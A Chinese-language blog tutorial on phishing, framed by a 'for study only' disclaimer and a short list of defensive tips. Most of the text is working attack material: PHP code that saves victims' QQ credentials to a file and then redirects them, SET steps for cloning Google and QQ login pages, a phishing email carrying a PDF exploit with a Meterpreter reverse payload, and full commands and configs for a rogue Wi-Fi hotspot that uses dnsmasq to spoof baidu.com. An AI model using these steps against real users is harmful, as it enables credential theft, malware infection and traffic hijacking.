注:文章內容僅供參考學習,任何人不得用於非法 測試。請遵守國家法律,做一個守法的良好公民。0x00 服務器端搭建的釣魚頁面
這種釣魚頁面,較為常見,攻擊者註冊與相關網站類似的域名,然後利用該網站的主頁或登錄頁面進行誘騙,引誘被攻擊者輸入賬號密碼等個人信息。
這裡利用手裡閒置的阿里的一臺服務器給大家做一下演示,構造一個簡單的手機端釣魚頁面。
先來看一下後端的主要代碼:
[PHP] 純文本查看 複製代碼
if (isset($_POST["user"])) {
if (isset($_POST["pass"])) {
$myfile = fopen("fish.txt", "a") or die("Unable to open file!");
$txt = "賬號".$_POST["user"]." 密碼".$_POST["pass"];
fwrite($myfile, $txt);
fclose($myfile);
//在這裡他完成輸入之後進行跳轉
echo '';//echo是輸出函數,可以輸出文本或者變量
}
}
?>
可以看到在被攻擊者輸入賬號密碼以後,信息被提交到同目錄下的 fish.txt 中,然後進行網站的跳轉,跳轉到真實的 qq 空間頁面。
該頁面的第一個選項是沒有用的,用戶只能點擊第二個選項,然後跳轉到如下頁面
在手機端是看不出什麼異常的,但是我們用電腦打開看看。
在電腦端打開的網站,url 地址顯示的是該釣魚頁面搭建的服務器域名和地址。
如果在這裡我們輸入了賬號和密碼,信息就會到 fist.txt 中。
而且如果你的手機有qq空間app的客戶端,不管你輸入什麼,都是會直接跳轉到你的空間的,在你沒覺得有什麼事情發生時,你的信息就已經洩露了。
x01 用 kali set 生成的釣魚網站
這裡我們先來利用 社會工程學工具包 SET 中自帶的模塊來生成 goole 的釣魚頁面。
生成以後我們訪問該 ip 地址,可以看到是 goole 的登錄頁面,而且這個時候 kali 接受到一條訪問 ip 的信息,我們嘗試輸入信息,點擊登錄,kail中就可以直接得到信息。
在倒數第二步我們選擇2.site clone ,還可以克隆其它頁面。這裡我又嘗試了去克隆 qq 空間的登錄頁面。
不過這裡我發現在你 qq 登錄的情況下,釣魚頁面會直接進入真正的 qq 空間的登錄頁面,而且如果你使用快捷登錄的方式或者掃碼登錄的方式,信息是不會被監聽到的。
0x02 用 kali set 發送釣魚郵件
這裡我們嘗試構造一個利用了 Adobe PDF 的 Collab.collectEmailInfo(堆溢出攻擊) 漏洞,然後默認將 Metasploit 中的 Meterpreter 反向攻擊荷載記載到 PDF 文件中,假如目標機中安裝有 Adobe Acrobat ,且存在該漏洞,我們就可以在對方打開文件時,釣魚成功。
下面是具體操作:
163郵箱的 SMTP 服務授權碼設置見下:
郵件發送成功就像這樣。
但是,這個測試的時候,生成的帶有 Payload 的附件,有時候會被檢測出來。我們來查看這個報錯返回了什麼,報錯狀態碼為 554,我們查看後面的鏈接可以看到是因為附件被163檢測出來了。
0x04 利用釣魚熱點釣魚
這次我們利用 kali 和一個無線網卡,來構造一個釣魚熱點,本地搭建 DNS 服務,修改 DNS 服務配置來欺騙受害者。
將 kali 與物理機進行橋接,與物理機在一個網段,然後插入無線網卡。
因為要啟動 dhcp 服務,我們先給虛擬網卡 eth0 設置一個靜態 ip 地址,
[AppleScript] 純文本查看 複製代碼
gedit /etc/network/interfaces
iface eth0 inet static //說明靜態配置
auto eth0 //指定網卡
address 192.168.43.76 //配置靜態ip
netmask 255.255.255.0 //子網掩碼
gateway 192.168.43.1 //網關
重啟 kali 的網絡。之後我們將網卡 wlan0 設置為監聽模式
[AppleScript] 純文本查看 複製代碼
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
接下來我們使用命令airbase-ng -e CICO -c 11 wlan0mon去創建 WIFI 。
保持該進程,重新打開一個終端,配置 wifi 網關。
ifconfig at0 up //啟動新建的 at0 虛擬網卡
gedit /etc/network/interfaces
auto at0
iface at0 inet static
address 192.168.1.1
netmask 255.255.255.0
重啟 kali 的網絡,可以看到 at0 已經有 ip 地址了。
接下來我們再來安裝配置 dhcp 服務,沒有該服務,手機無法連接釣魚 wifi。
安裝以後,我們設置一下網段,子網掩碼,網關地址,默認 dns 服務器地址,配置如下:
gedit /etc/dhcp/dhcpd.conf
subnet 192.168.1.0 netmask 255.255.255.0 {
range 192.168.1.100 192.168.1.150;
option routers 192.168.1.1;
option subnet-mask 255.255.255.0;
option domain-name-servers 192.168.43.76; }
將 at0 指定為 dhcp 的網卡。
gedit /etc/default/isc-dhcp-server
INTERFACESv4='at0'
重新啟動 dhcp 服務。
下面我們來配置最重要的地方,就是 dns 服務,以 dnsmasq 為例,具體配置大家可以參考這篇文章。
https://sp4rkw.blog.csdn.net/article/details/101681716
我們之所以可以用該熱點釣魚成功就在於 dns 服務的配置,安裝以後我們進行如下配置:
gedit /etc/dnsmasq.conf
resolv-file=/etc/resolv.conf
strict-order
listen-address=192.168.43.76
address=/baidu.com/47.**.**.** //將域名解析到如下地址,該例中我嘗試將baidu.com的域名解析到我自己的服務器下。
server=8.8.8.8
server=114.114.114.114
重啟 dnsmasq 服務。
打開 linux 內核的轉發模塊,並用 iptables 進行規制編寫,命令如下:
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -j SNAT --to 192.168.43.76
這裡我們就完成了釣魚熱點的搭建,連上熱點的手機訪問百度的域名都會被解析到我的服務器地址......
0x05 避免釣魚方法總結
(1.)不要隨意連公共的 WIFI 網絡。
(2.)涉及到賬戶,密碼等個人信息的提交登錄時,確保網絡環境可信。
(3.)儘量不使用賬號密碼的登錄方式登錄。
(4.)垃圾或者來歷不明的郵件附件不要查看。
(5.)別相信絕對安全。
注:文章內容僅供參考學習,任何人不得用於非法測試。請遵守國家法律,做一個守法的良好公民。
閱讀更多 安界 的文章